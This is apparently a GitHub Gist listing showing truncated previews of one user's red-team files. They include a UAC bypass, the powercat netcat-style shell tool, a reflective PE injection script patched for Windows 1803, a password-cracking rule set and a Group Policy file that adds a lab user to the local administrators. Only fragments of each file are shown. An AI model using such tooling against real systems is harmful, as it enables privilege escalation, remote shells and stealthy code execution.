crusher chryzsh
chryzsh
/ install-vmwaretools.ps1
Created
May 31, 2019 10:33
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Version = Invoke-WebRequest https://packages.vmware.com/tools/releases/latest/windows/x64/ -UseBasicParsing | Select-Object -ExpandProperty links | Select-Object href -ExpandProperty href | Select-String VM | |
| $DownloadUrl="https://packages.vmware.com/tools/releases/latest/windows/x64/$Version" | |
| $DownloadPath="C:\Windows\Temp\$Version" | |
| Write-host "Downloading vmware tools from $DOwnloadUrl and saving to $DownloadPath" | |
| Invoke-WebRequest -UseBasicParsing -Uri $DownloadUrl -OutFile $DownloadPath | |
| #(New-Object System.Net.WebClient).DownloadFile($DownloadUrl, $DownloadPath) |
chryzsh
/ Set-PasswordRemotely.ps1
Created
May 7, 2019 08:25
Change an expired password remotely without Interactive access as that user. The method above is actually based on NetUserChangePassword function.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Set-PasswordRemotely { | |
| [CmdletBinding()] | |
| param( | |
| [Parameter(Mandatory = $true)][string] $UserName, | |
| [Parameter(Mandatory = $true)][string] $OldPassword, | |
| [Parameter(Mandatory = $true)][string] $NewPassword, | |
| [Parameter(Mandatory = $true)][alias('DC', 'Server', 'ComputerName')][string] $DomainController | |
| ) | |
| $DllImport = @' | |
| [DllImport("netapi32.dll", CharSet = CharSet.Unicode)] |
chryzsh
/ powershell-uac-always-notify-bypass.ps1
Created
April 28, 2019 22:06
uac bypass for always notify (works on 1903)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $assemblies=( | |
| "System" | |
| ) | |
| $source=@" | |
| using System; | |
| using Microsoft.Win32; | |
| using System.Diagnostics; | |
| namespace Helloworld |
chryzsh
/ powercat from nishang
Created
March 16, 2019 10:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function powercat | |
| { | |
| param( | |
| [alias("Client")][string]$c="", | |
| [alias("Listen")][switch]$l=$False, | |
| [alias("Port")][Parameter(Position=-1)][string]$p="", | |
| [alias("Execute")][string]$e="", | |
| [alias("ExecutePowershell")][switch]$ep=$False, | |
| [alias("Relay")][string]$r="", | |
| [alias("UDP")][switch]$u=$False, |
chryzsh
/ chris.rule
Created
March 11, 2019 20:46
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # # | |
| # @Stealthsploit / https://stealthsploit.com # | |
| # Created using top 25% performing rules from: # | |
| # InsidePro-HashManager, d3ad0ne, dive, # | |
| # InsidePro-PasswordsPro, rockyou-30000, # | |
| # KoreLogic's Rockyou50000, _NSAKEY.v2.dive # | |
| # against various leaked data breaches # |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2019-03-07 17:32:24" uid="{ECC42B3A-5D61-4705-BC17-467C4A2764DE}"><Properties action="U" newName="" description="GPP - admins" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-1302490888-793887298-1113"/></Members></Properties></Group> | |
| <Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Remote Desktop Users (built-in)" image="2" changed="2019-03-07 17:33:38" uid="{5F8E65C1-F1BA-4207-8549-5D6606F8E7DF}"><Properties action="U" newName="" description="gpp - add chry rdp" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-555" groupName="Remote Desktop Users (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-130 |
chryzsh
/ Invoke-ReflectiveInjection1803.ps1
Created
October 24, 2018 17:05
Got some help fixing reflective injection to work on 1803 https://blog.cobaltstrike.com/2018/05/24/powershell-shellcode-injection-on-win-10-v1803/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-ReflectivePEInjection | |
| { | |
| <# | |
| .SYNOPSIS | |
| This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, | |
| or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, | |
| please lead the Notes section (GENERAL NOTES) for information on how to use them. | |
| 1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. |